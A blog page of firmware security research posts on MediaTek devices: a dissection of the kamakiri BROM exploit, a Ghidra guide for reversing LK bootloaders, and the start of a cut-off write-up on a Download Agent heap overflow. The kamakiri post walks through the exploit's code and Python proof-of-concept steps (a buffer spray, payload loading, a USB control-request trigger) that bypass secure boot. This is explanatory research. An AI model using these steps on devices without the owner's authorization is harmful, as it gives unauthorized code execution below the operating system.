R0rt1z2

Dissecting a mantis - the kamakiri exploit

Sat, 02 May 2026 00:00:00 GMT

Introduction

I've known about the "kamakiri" 🦗 exploit for a while now, and like many others, I've even used it in practice, but I never really stopped to understand how it actually works under the hood.

There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn't much in the way of clear, detailed explanations of how they function internally.

Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it's the one I've used the most.

FWIW, this isn't the beginning of a full write-up series on all the MediaTek exploits, I'm just taking notes so I don't forget how any of this works later (future-me is notoriously unreliable lol).

Background

On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a Download Agent.

Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.

Since this has already been covered in the heapbait blog post, I won't go into detail here, but the three main mechanisms are Serial Link Authorization, Download Agent Authentication, and Secure Boot Control.

The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.

From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.

Origin

Before diving into the technical details, it's worth taking a step back to look at how and why this exploit came to be.

While it's unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when k4y0z and xyz` on XDA released a method to unlock the bootloader of the Fire TV Stick 4K.

At the time, the only known BROM exploit was amonet, which was already a few years old and had been patched on newer devices.

For those unfamiliar, "kamakiri" is the Japanese word for "mantis". The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is "mantis."

Source: u/Halakahiki on Reddit

It's also worth noting that there are two "variants" of this exploit, though in reality they're quite different under the hood.

The most commonly used one is the "v2" (kamakiri2) variant, which came later and is generally easier to work with. This post will focus on the original one.

USB Stack

To understand the exploit, you first need a rough picture of how the BROM's USB stack is organized. It's not complicated, but there are three specific pieces that matter:

The transmit buffer.
The echo protocol.
The interface handler table.

Each one is nothing special on its own, it's only when you look at them together that things get interesting.

The USB stack layers

Before getting into the buffers, it's worth understanding how the USB stack is organized, because it's a bit more layered than you might expect.

At the bottom there's the raw USB hardware; registers, FIFOs, endpoints. USB_EPFIFOWrite talks to this level directly, writing bytes into the hardware FIFO one at a time:

void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) {
    USB_INDEX = nEP;

    uint8_t *p = (uint8_t *)pSrc;
    uint8_t *fifo = (uint8_t *)(nEP * 4 + 0x11100020);

    while (nBytes--) {
        *fifo = *p++;
    }
}

Above that sits the ACM layer. USBDL_PutByte and its receive counterpart handle the staging buffers and know about packet boundaries:

void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) {
        USB_EPFIFOWrite(...);
        usbacm_tx_buf.len = 0;
    }
}

But there's another layer on top of all of this that's easy to miss. At some point during initialization, the BROM calls IO_Init, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:

void IO_Init(IO_INTERFACE vio) {
    if (vio == IO_USB) {
        IO_GetData  = (code *)0x5E99;  // USBDL_GetByte
        IO_PutData  = (code *)0x5EB3;  // USBDL_PutByte (wrapper)
        IO_TX_Flush = (code *)0x7321;  // USBDL_Flush
    } else if (vio == IO_UART) {
        IO_GetData  = (code *)0xD029;  // UART_adpt_GetData
        IO_PutData  = (code *)0xD043;  // UART_adpt_PutData
        IO_TX_Flush = (code *)0xD05D;  // UART_CheckSendComplete
    }
}

Whichever interface gets selected, the command handlers don't call USBDL_PutByte directly.

Instead they go through a small serialization layer IO_PutData32_Ex, IO_PutData16_Ex, and IO_PutByte_Ex, which breaks values down into individual bytes and feeds them into IO_PutData one at a time:

void IO_PutData32_Ex(uint32_t data32, bool flush_tx) {
    for (int i = 0; i < 4; i++) {
        uint8_t byte = data32 >> (24 - i * 8);
        (*IO_PutData)(&byte, 1, 0xffffffff);
    }
    if (flush_tx)
        (*IO_TX_Flush)();
}

This means none of the command handlers need to know which interface is active, they just call IO_PutData32_Ex and let the function pointer table sort it out. The full picture looks like this:

The transmit buffer

When the BROM needs to communicate with the host, it doesn't read from or write to the USB hardware directly.

Instead, it stages data in RAM first. There's a receive buffer for incoming data and a transmit buffer for outgoing data.

For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.

The transmit buffer is a structure called usbacm_tx_buf, sitting at 0x001060E0 (for MT8167):

struct {
    uint32_t len;    // 0x001060E0 (how many bytes are currently queued)
    uint8_t  data[]; // 0x001060E4 (the actual bytes)
} usbacm_tx_buf;

len is the write cursor, it tracks how many bytes are currently sitting in data[] waiting to be sent.

Every outgoing byte goes through USBDL_PutByte, which appends it to data[] and bumps len:

void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS
        USB_EPFIFOWrite(txpipe->byEP, packet_size, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(txpipe->byEP);
        usbacm_tx_buf.len = 0;
    }
}

Once len hits the packet size, the buffer gets flushed to the hardware FIFO and len resets to zero. The bytes in data[] don't get cleared, they just sit there in RAM until something else writes over them.

There's also USBDL_Flush(), which sends whatever's currently queued without waiting for the buffer to fill up:

void USBDL_Flush(void) {
    if (nDevState == DEVSTATE_CONFIG && usbacm_tx_buf.len != 0) {
        nEP = txpipe->byEP;
        gUSBAcm_IsInEPComplete = false;
        USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(nEP);
        while (!gUSBAcm_IsInEPComplete)
            USB_HISR();
        usbacm_tx_buf.len = 0;
    }
}

Same result, len resets to zero, bytes stay in RAM. This "stale bytes" behavior is going to matter a lot later.

BROM command loop

BROM doesn't always end up in the command loop, this only happens when it boots into USBDL mode. There are a few reasons this can happen.

The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that's simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.

Whatever the cause, once the BROM decides it's in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.

The loop reads a command byte and dispatches it to the appropriate handler:

void BromCmdLoop(void) {
    BromCmdLoop_Init();
    while (true) {
        uint8_t cmd = IO_GetByte();
        IO_PutByte_Ex(cmd, true); // echo cmd
        switch (cmd) {
        case 0xD1: BromCmd_Read(CMD_LEN_32, false);  break;
        case 0xD4: BromCmd_Write(CMD_LEN_32, true);  break;
        case 0xE0: BromCmd_SendCert();               break;
        case 0xFD: BromCmd_Get_HW_Code();            break;
        // ...
        }
    }
}

There are quite a few commands, but the ones relevant to this exploit are:

0xD1: BromCmd_Read: read arbitrary memory and echo it back
0xD4: BromCmd_Write: write arbitrary memory
0xE0: BromCmd_SendCert: load a blob into memory at a fixed address

Every one of these handlers echoes its arguments back before doing anything.

The interface handler table

When the BROM receives a USB control request on endpoint 0, it hands it off to USB_Endpoint0_Idle.

This function is responsible for parsing the request and dispatching it to the appropriate handler:

void USB_Endpoint0_Idle(void) {
    USB_EPFIFORead(0, 8, &cmd);

    if ((cmd.bmRequestType & USB_CMD_TYPEMASK) == 0) {
        // standard requests
        switch (cmd.bRequest) {
        case 0x05: stall = USB_Cmd_SetAddress(&ep0info, &cmd);    break;
        case 0x06: stall = USB_Cmd_GetDescriptor(&ep0info, &cmd); break;
        case 0x09: stall = USB_Cmd_SetConfiguration(&ep0info, &cmd); break;
        case 0x0b: stall = USB_Cmd_SetInterface(&ep0info, &cmd);  break;
        // ...
        }
        return;
    }

    // class specific requests
    if ((cmd.bmRequestType & 0x60) != 0x20) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if ((cmd.bmRequestType != 0xA1) && (cmd.bmRequestType != 0x21)) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
        (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
        return;
    }

    USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
}

Standard requests like SetAddress or GetDescriptor are handled inline whereas class specific requests (identified by bmRequestType having the class bit set) get dispatched through a different path.

For those, the BROM looks up the handler in if_info, a table of interface descriptors sitting at 0x00103780.

Each entry is 0x34 bytes and contains, among other things, a function pointer at offset +0x04:

struct Usb_Interface_Info {
    char     *interface_name;          // +0x00
    void     *if_class_specific_hdlr;  // +0x04 (function pointer)
    uint16_t  ifdscr_size;             // +0x08
    // ...
};

When a class specific request comes in, the BROM takes cmd.wIndex, uses it as an index into if_info, and calls the handler directly:

(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

There are only three registered interfaces, but nothing stops you from requesting wIndex=200, or wIndex=204, or any other value that lands outside the legitimate interface entries.

Walking through the PoC

Now that we have a somewhat solid understanding of the USB stack, let's walk through the exploit step by step.

The PoC we'll be looking at can be found here and there are probably other versions floating around, but they all do the same thing in the end.

Handshake and setup

dev.handshake()
dev.write32(0x10007000, 0x22000000)

Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four byte sequence.

BROM expects A0 0A 50 05 and responds with the bitwise complement of each byte. Once that's done, it is ready to accept commands.

If the device was entered via a hardware short on the eMMC, the user also needs to release the short at this point before continuing.

The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:

thread = UserInputThread()
thread.start()
while not thread.done:
    dev.write32(0x10007008, 0x1971)  # kick watchdog
    time.sleep(1)

Once the short is released and the thread signals done, execution continues with the rest of the exploit.

The TX buffer spray

The next thing the PoC does is manipulate the TX buffer:

addr = 0x10007050
dev.write32(addr, [0xA1000])
cnt = 15
for i in range(cnt):
    dev.read32(addr - (cnt - i) * 4, cnt - i + 1)

The goal is to get 0x000A1000, the payload address in LE, to land at a specific offset inside usbacm_tx_buf that corresponds to if_info[wIndex].if_class_specific_hdlr for the wIndex we plan to use in the trigger step.

WDT_BASE + 0x50 is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.

What the register itself does doesn't really matter, what matters is that it's accessible without triggering any access violations.

write32(addr, [0xA1000]) plants 0x000A1000 there. From that point, the loop issues a series of reads with increasing starting addresses and sizes, all anchored around addr.

Each iteration reads one more word than the last, starting one address further back:

i=0:  read32(addr - 60, 16)
i=1:  read32(addr - 56, 15)
...
i=14: read32(addr - 4,  2) (last word = addr = 0x000A1000)

Every one of those reads echoes its data back through USBDL_PutByte, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.

The end result is the same. 0x000A1000 ends up sitting at the right offset inside usbacm_tx_buf to overlap with if_info[wIndex].if_class_specific_hdlr.

Loading the payload

For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, BromCmd_SendCert (0xE0) does exactly that.

It was probably designed to receive a certificate blob from the host and load it into memory at 0x100A00 for verification.

def attempt2(d):
    d.write(b"\xE0")
    result = d.read(1)
    d.write(p32(0xA00))
    result = d.read(4)
    payload = load_payload_file("../brom-payload/stage1/stage1.bin")
    d.write(payload)

The host sends 0xA00 as the length, the BROM echoes it back, then reads that many bytes into 0x100A00. On the BROM side:

uint32_t BromCmd_SendCert(void) {
    uint32_t len = IO_GetData32();
    IO_PutData32_Ex(len, true);

    if (!bExecOnce) {
        bExecOnce = true;
        if (Secure_SCTRL_CERT_IsValidRange(len) < 0xff) {
            IO_PutData16_Ex(status, true);
            IO_GetDataBlock8(0x100A00, len, 5);  // payload lands here
            Secure_SCTRL_CERT_Verify(0x100A00);  // fails, but doesn't clean up
        }
    }

    IO_PutData16_Ex(status, true);
    return status;
}

The detail here is that the data gets written to memory before verification runs. The cert check will fail since we're not sending anything valid, but BROM never cleans up the memory afterwards.

The only real constraint is size, the payload must fit within 0xA00 bytes, which is solved by using a two-stage approach.

Pulling the trigger

At this point the two pieces are in place, the payload is sitting at 0x100A00 and usbacm_tx_buf has been sprayed with 0x000A1000 at the right offset. All that's left is to trigger the jump.

To confirm this, here's a hexdump of usbacm_tx_buf taken from inside the stage1 payload immediately after it starts running:

001060E0  00 00 00 00 A1 A2 A3 A4  00 0A 10 00 00 0A 10 00  |................|
001060F0  00 0A 10 00 00 0A 10 00  00 0A 10 00 00 0A 10 00  |................|

len is zero (the buffer was flushed), and 0x000A1000 is sitting repeatedly through data[]. The value at data[16] = 0x1060F4 is what matters, that's where if_info[204].if_class_specific_hdlr lives:

>>> hex(0x00103780 + 204 * 0x34 + 4)
'0x1060F4'

0x00103780 is the base address of if_info, 0x34 is the size of each entry, 204 is the index, and +4 is the offset of if_class_specific_hdlr within the entry.

The result lands exactly at 0x1060F4, inside usbacm_tx_buf.data[]. The trigger is a USB control request:

try:
    udev.ctrl_transfer(0xA1, 0, 0, 204, 0)
except usb.core.USBError as e:
    print(e)

0xA1 is bmRequestType with the class bit set (0x20) and the direction bit set (0x80). This translates to a class-specific request from device to host.

wIndex=204 is what gets used to index into if_info. USB_Endpoint0_Idle receives the request and does:

(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

if_info[204].if_class_specific_hdlr contains 0x000A1000 (put there by the spray) so execution jumps straight to the payload at 0x100A00.

The stage1 payload confirms it's running by sending back 0xA1A2A3A4:

data = d.read(4)
if data != b"\xA1\xA2\xA3\xA4":
    raise RuntimeError("...")

If that comes back, the exploit succeeded and the payload is running.

Fixes

The vulnerability was patched at some point, the first chip where it was publicly identified to be fixed is the MT6853, seen in 2021, but it may have been patched earlier on other chips.

The fix itself is straightforward, a simple bounds check on wIndex before the handler dispatch:

// vulnerable
if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
    return;
}

// fixed
if (((byte)cmd.wIndex < 3) &&
    (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) {
    (*handler)();
    return;
}

There are only three registered interfaces, so any wIndex >= 3 now gets rejected outright. The OOB access into if_info is no longer possible.

On the BromCmd_SendCert side, the patched BROM also zeroes out the memory at 0x100A00 if verification fails:

if (verify_failed) {
    memset(0x100A00, 0, len);  // clean up on failure
}

So even if the jump could somehow be triggered, there'd be nothing useful at 0x100A00 to land on.

Conclusion

Seven years. That's how long it took me to actually sit down and understand an exploit I've been using since forever. Better late than never I guess.

And honestly, now that I understand how it works, I'm surprised at how "simple" it actually is, at least compared to a lot of the other exploits that I've looked at.

I wasn't even planning to make this a whole post, this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.

How to Reverse Engineer MediaTek Bootloaders

Mon, 30 Mar 2026 00:00:00 GMT

Introduction

I've been working on a lot of projects involving MediaTek bootloaders lately, and they've been getting more attention over time.

Because of that, I thought it would make sense to put together a proper guide on how to reverse engineer MediaTek LKs, while keeping it as beginner friendly as possible and adding some visuals along the way.

I've written a few guides on this topic before, but I've improved quite a bit since then and started using some new techniques that make the process easier.

So instead of leaving everything scattered, this guide brings it all together in one place (or tries to, at least).

Requirements

This guide assumes you have a computer and at least some basic common sense. Other than that, you'll need:

Install everything from the official sources linked above, and make sure your Java environment is set up correctly for Ghidra.

I'm not going to cover installation here since it's straightforward, and you can always look it up if needed.

Background

MediaTek uses a bootloader called LK (Little Kernel) on most of its Android devices, although some platforms may use alternatives like u-boot.

LK typically acts as the third-stage bootloader and runs in S-EL1 (Secure EL1) on ARMv8 devices, and in PL1 (Supervisor mode) on ARMv7 devices. If we follow ARM naming conventions, this would be BL33.

There are two main variants of LK:

Legacy LK (v1.0): Found on older devices. These are typically paired with V3 (legacy) or V5 (XFLASH) DA protocols. LK runs in ARMv7 mode, even on SoCs that support ARMv8.
Modern LK (v2.0): Used on newer devices, typically paired with the V6 (XML) DA protocol. It runs in ARMv8 mode with the MMU enabled, inside a virtual memory space.

The LK image you find on a MediaTek device is packed and contains multiple sub-partitions. The exact number depends mostly on the LK variant.

Legacy LK usually includes lk and lk_main_dtb, while modern LK includes lk, bl2_ext, aee, lk_main_dtb, and lk_dtbo.

Each partition has its own header defining size and other runtime parameters, and in most cases also includes two associated certificates (cert1 and cert2) used for verification as part of the secure boot chain.

This is pretty obvious (and, in my opinion, a bit stupid), but some people still get confused: the file extension does not really matter.

You can list the sub-partitions in your image using lkpatcher:

$ python3 -m lkpatcher lk.bin --list-partitions
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from pacman.bin with 5 partitions (version 2)

Partitions in bootloader image:
----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------

Instructions

Depending on the image you have, the exact steps may vary, but the general process is similar.

Extracting the actual LK binary

Start by extracting the actual lk sub-partition from the image. You can do this with lkpatcher:

$ python3 -m lkpatcher lk.bin -d lk
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from lk.bin with 2 partitions (version 1)
========================================
Partition Name  : lk
Data Size       : 1246148 bytes
Addressing Mode : 0xffffffff
Memory Address  : 0x4c400000
========================================
[INFO] Successfully dumped partition lk to lk_lk.bin

This will give you a file called lk_lk.bin, which is the actual LK binary we want to reverse engineer.

Make sure to note down the Memory Address from the output, as this is the base address where the binary is loaded in memory. This will be important later during analysis.

Also note down the version of the LK (v1.0 or v2.0) as this determines the architecture and some of the techniques we'll use later on.

For version 2 (modern) LKs, you might see a very large memory address (e.g. 0xffff000050f00000), which is completely normal, don't worry about it.

Loading the Binary in Ghidra

If you haven't already, create a new Ghidra project. Give it a name and choose where to store it.

Drag and drop the lk_lk.bin file into the project window. This will open the "Import File" dialog.

The only thing we need to configure here is the Language option. Everything else can stay as is.

Click the three dots next to the Language field to open the "Select Language" dialog. From here, choose the correct architecture for your binary:

If you're working with a legacy LK (v1.0), select ARM:LE:32:v7:default, as it runs in ARMv7 mode.
If you're working with a modern LK (v2.0), select AARCH64:LE:64:v8A:default, as it runs in ARMv8 mode.

ARMv7 (Legacy LK)	ARMv8 (Modern LK)

If selected correctly, it'll look like this (the Language will differ if you're dealing with a modern LK):

Simply click OK and wait for the file to be imported into the project.

Analyzing the Binary

After importing the file, it will appear in your project view. Double click it to open it in the CodeBrowser.

You'll be prompted to run auto-analysis. It is important that you choose No here, as we still need to configure a few things first. Running it now will only cause confusion and make things harder.

Since we chose not to run auto-analysis, go to the top menu bar and locate the icon that looks like a RAM stick. Click it to open the Memory Map window.

In the Memory Map, select the "ram" section and disable the "W" (write) permission, which is enabled by default. Only "R" (read) and "X" (execute) should remain enabled.

In the same window, locate the house icon, which opens the "Image Base Address" dialog.

Click it and set the base address to the Memory Address you noted earlier when extracting the binary with lkpatcher (e.g. 0x4c400000 or 0xffff000050f00000).

Click the Save icon in the top left corner to apply the changes, then close the Memory Map window and return to the CodeBrowser.

In the CodeBrowser, go to the top menu bar and click Edit > Tool Options to open the Tool Options dialog.

Search for "Unreachable", then go to Decompiler > Analysis and disable the "Eliminate Unreachable Code" option (enabled by default). Click Apply, then OK to save.

Finally, trigger auto-analysis by pressing A in the main CodeBrowser window. In the dialog that appears, leave everything as is and click OK.

If everything was done correctly, once the analysis finishes:

For legacy LKs (v1.0), in the listing (ASM) view you should see a vector table, and in the Decompiler view you should see an unnamed function that sets up the stack, BSS, and other sections.
For modern (v2.0) LKs, you won't see a vector table, but you should still see the unnamed function that sets up the stack, BSS, and other sections.

Legacy LK (v1.0)	Modern LK (v2.0)

That should be it. This guide was meant to be concise, so there’s not much more to explain here. You should now have an easier time understanding what certain functions do and how the bootloader works.

ARMv8 Bonus: Ghidra Script

If you're working with ARMv8 (modern) LKs, I have a Ghidra script that can speed things up quite a bit.

It automatically resolves and renames a number of commonly used functions (like lk_main, dprintf, fastboot_*, init functions, etc.), and also defines some basic structs and enums to make the decompilation output cleaner.

You can use it by doing the following:

Add the script to your Ghidra scripts directory (via Script Manager -> Script Directories).
Load and analyze your LK binary as shown above.
Run the script from the Script Manager.

More details and the script are available in my GitHub repository.

Exploiting MediaTek's Download Agent

Fri, 30 Jan 2026 00:00:00 GMT

Introduction

In September 2025, Chimera quietly announced "world-first" support for MediaTek's latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched Carbonara.

So we figured they'd either found a way around the patches, or they were sitting on something entirely new. We had to find out.

Shortly after shomy opened a PR adding Carbonara support to MTKClient, someone left a comment with a USB capture of Chimera and a note:

So we did.

What followed was months of USB packet captures, late-night reversing sessions, and way too many crashes and reboots, all done together with shomy!

What we eventually found was heapb8 (/ˈhiːpbeɪt/, "heap-bait"), a heap overflow in DA2's USB file download handler that allows arbitrary code execution on V6 devices patched against Carbonara.

In this post, we'll walk through how we went from noticing Chimera's suspicious update to achieving code execution on modern MediaTek SoCs.

It's a long and fairly technical write-up, so take a seat. I've tried to keep it readable, but it's still a deep dive.

Background

MediaTek devices have two different USB download modes exposed by different boot stages: BootROM and Preloader.

For the past few years, tools like MTKClient have been exploiting vulnerabilities in the BootROM's USB stack to gain code execution.

However, MediaTek patched most of these vulnerabilities in newer SoCs, and to make matters worse, a lot of OEMs opted to disable BootROM USBDL entirely on their devices, leaving Preloader USBDL as the only option.

Download Agents

Since this writeup focuses on DA2 exploitation, let's briefly cover how MediaTek's Download Agents work.

To interact with the device in either of these modes, MediaTek uses Download Agents (DAs). DAs are small programs that run on the device and handle USB communication, flashing, and other low-level operations.

Each DA is built for a specific chipset (identified by its hardware code), though some DA files like MTK_AllInOne_DA.bin bundle multiple chipsets into a single binary.

There are three main DA protocol versions:

Legacy (V3): Codename himalaya. Found on older devices (MT65XX series).
XFlash (V5): Codename raphael. Found on devices released between 2016 and ~2022.
XML (V6): Codename chimaera. Found on modern devices, mainly Dimensity and newer Helio chips.

heapb8 targets the XML (V6) DA protocol, so that's what we'll focus on.

Structure

The DA file starts with a 0x6C byte header containing the magic string MTK_DOWNLOAD_AGENT (or MTK_DA_v6 for V6), a version number, and the number of supported SoCs.

Following the header is an array of DA entries, one per chipset. Each entry contains the hardware code, sub-code, and a list of regions:

Region 0: Loader/stub (small bootstrap code)
Region 1: DA1
Region 2: DA2

Each region has an offset, length, load address, and signature length. The signature (if present) is appended at the end of the region data.

DA1 and DA2

DA1: Handles early hardware initialization (PLL, PMIC, storage, DRAM) and USB communication setup. Its main job is to prepare the device and load DA2.
DA2: Runs a small multithreaded kernel and handles the actual device operations, flashing, reading partitions, security checks, and everything else you'd expect from a flash tool.

heapb8 targets DA2, specifically its USB file download handler.

Uploading the DA(s)

MediaTek has 3 different security mechanisms in both BootROM and Preloader:

Secure Boot Control (SBC): Controls whether the current stage verifies the next stage of the boot chain. For BootROM, this means verifying Preloader. For Preloader, this means verifying LK or bl2_ext based on a security policy table.
Serial Link Authorization (SLA): Authenticates the host before allowing operations. There are two types:
- BROM SLA: The BootROM sends a challenge that must be signed with an OEM-held key. MediaTek's implementation is a bit unusual, instead of standard RSA signing, they swap the public and private exponents.
- DA SLA: Introduced in V5 (raphael). If the DA is compiled with DA_ENABLE_SECURITY, most commands are locked behind authentication. The host must call CMD_SECURITY_GET_DEV_FW_INFO to get device info, sign it, then call CMD_SECURITY_SET_FLASH_POLICY with the signed response. If valid, the DA registers the protected commands. You can check if DA SLA is enabled by reading the DA.SLA system property.
Download Agent Authentication (DAA): Verifies the DA's signature before loading it. This is done by checking the signature appended to the DA against a trusted key before allowing execution.

After handshaking (and BROM SLA if enabled), the host issues CMD_SEND_DA (0xD7) to upload DA1. If DAA is enabled, the signature is verified before setting the g_da_verified flag.

The host then issues CMD_JUMP_DA (0xD5) to transfer execution, but only if g_da_verified is set, otherwise the device asserts and reboots.

Once DA1 is running, a similar process repeats: DA1 verifies and loads DA2 using CMD_BOOT_TO, then jumps to it.

Chimera

Our target was relatively clear: figure out how Chimera was exploiting patched DAs. The first step was to capture USB traffic between Chimera and a target device.

For our target, we went with the Nothing Phone 2A, it runs a MediaTek Dimensity 7200 Pro and is listed under Chimera's supported devices.

Chimera is one of the more "premium" GSM tools out there, and it shows; VM detection, USB packet capture detection, and various other anti-analysis techniques make it clear the developers have put real effort into preventing reverse engineering.

USB Capture

Chimera's anti-analysis means you can't just fire up Wireshark and start capturing packets. Instead, we relied on a physical USB sniffer to capture traffic between Chimera and the device.

We've used this device before and it works well, though I'll admit it's absurdly expensive. You could probably hack together a cheaper alternative, but that's a project for another day.

UART

Capturing USB traffic is only half the battle, we also needed to see what the DA was doing on the device itself. For that, we used UART.

Thankfully, @AntiEngineer had already spent hours probing the board with a logic analyzer to find the UART pins. He put together a nice setup that proved invaluable for this research.

On the Nothing Phone 2A, UART is accessible through two small pads behind the main camera module:

Motherboard	UART pins

BROM outputs UART at 115200 8N1, while everything that comes after (Preloader, DAs, etc.) runs at 921600 8N1 by default.

We used a cheap TTL-USB adapter to connect the pads to our computer. For serial interaction, I personally recommend tio.

One annoying quirk about this device (and probably many others) is that UART logs get cut off during Preloader initialization as soon as you see the Log Turned Off. message.

This is controlled by a global variable called g_log_switch. During boot, the Preloader checks if a certain key combination is held (usually volume up or down) and sets the switch accordingly.

If the switch is off, outchar() skips calling PutUARTByte() entirely, so nothing gets printed. The logs are still written to a DRAM buffer, but you won't see them over UART:

static void outchar(const char c)
{
    if (g_log_disable) {
        if (log_ptr < log_end)
            *log_ptr++ = (char)c;
        else
            g_log_miss_chrs++;
    } else {
        if (get_log_switch()) {
            PutUARTByte(c);
#if (CFG_DRAM_LOG_TO_STORAGE)
            log_to_storage(c);
#endif
        }
        pl_log_store(c);
    }

#if (CFG_OUTPUT_PL_LOG_TO_UART1)
	PutUART1_Byte(c);
#endif
}

Getting the Capture

With our capture environment set up, we proceeded to capture a full Chimera session. I'd like to thank @erdilS for lending us his Chimera license for this research :)!

The tool is expensive, and I wasn't about to spend that much money for what was supposed to be a simple one-off analysis (spoiler: it wasn't :D).

The capture uses a proprietary format that can only be opened with Total Phase's Data Center software. It's not as fancy as Wireshark, but it gets the job done.

Dissecting the Exploit

With the capture in hand, it was time to figure out what Chimera was actually doing.

The plan was simple, or so we thought: extract the DAs, compare them against known good copies, and trace through the USB traffic to find where things get interesting.

Extracting the DAs

The first thing we did was extract both DAs from the capture and compare them against the ones we had previously dumped from the official Nothing Flash Tool.

The hashes matched, so Chimera is using unmodified DAs with the same build date as the official tool:

============================================================
DA Header Type: V6
Number of SoCs: 1
============================================================
[SoC 0]
  DA Mode: V6
  HW Code     : 0x1229
  HW Sub Code : 0x8A00
  Magic       : 0xDADA
  Regions     : 3
  Region 0: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 1: Offset: 0xBC, Length: 0x96E00, Addr: 0x2000000, Region Length: 0x96D00, Sig Len: 0x100
  Region 2: Offset: 0x96EBC, Length: 0x59930, Addr: 0x40000000, Region Length: 0x59830, Sig Len: 0x100

Thanks to this, we know we're dealing with a V6 DA built for HW code 0x1229 (Dimensity 7200 / 7200 Pro). To load them in Ghidra, use base address 0x2000000 for DA1 and 0x40000000 for DA2.

One thing worth noting is that V6 DAs can run in either ARM64 or ARM32 (non-THUMB) mode, which made porting the exploit a bit annoying later on.

In our specific case, both stages are ARM64, so we analyze them as AARCH64 (ARMv8) Little Endian.

Tracing the USB Traffic

We started by analyzing the full boot sequence: Preloader receiving DA1 over USB, verifying its signature, and jumping to it.

Then DA1 does the same for DA2: receives it, verifies it, and transfers execution. Nothing unusual there, everything looked standard (mind you, we really wasted an entire night analyzing ~37100 packets of boring USB traffic).

While running Chimera, I also tried to catch UART logs hoping for some useful debug output, but it ended up being useless. They set the log level to ERROR right after DA1 starts using CMD:SET-RUNTIME-PARAMETER:

<?xml version="1.0" encoding="UTF-8"?>
<da>
    <version>1.0</version>
    <command>CMD:SET-RUNTIME-PARAMETER</command>
    <arg>
        <checksum_level>NONE</checksum_level>
        <da_log_level>ERROR</da_log_level>
        <log_channel>UART</log_channel>
        <battery_exist>AUTO-DETECT</battery_exist>
        <system_os>LINUX</system_os>
    </arg>
    <adv>
        <initialize_dram>YES</initialize_dram>
    </adv>
</da>

This basically tells both the DA1 and DA2 not to spit logs to UART unless they're errors, so instead of useful debug traces, we got mostly silence:

***dagent_command_loop:***

@Protocol: Tx START-CMD(<?xml version="1.0" encoding="utf-8"?><host><version>1.0</version><command>CMD:START</command></host>)

@Protocol: Rx Host CMD(<?xml version="1.0" encoding="UTF-8"?><da><version>1.0</version><command>CMD:SET-RUNTIME-PARAMETER</command><arg><checksum_level>NONE</checksum_level><da_log_level>ERROR</da_log_level><log_channel>UART</log_channel><battery_exist>AUTO-DETECT</battery_exist><system_os>LINUX</system_os></arg><adv><initialize_dram>YES</initialize_dram></adv></da>)

@Protocol: Execute CMD(CMD:SET-RUNTIME-PARAMETER)
[SPMI] spmi_init_1 done
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
hmac status 0x0
Not BOOT_TRAP_EMMC_UFS
Host notice error or user canceled.
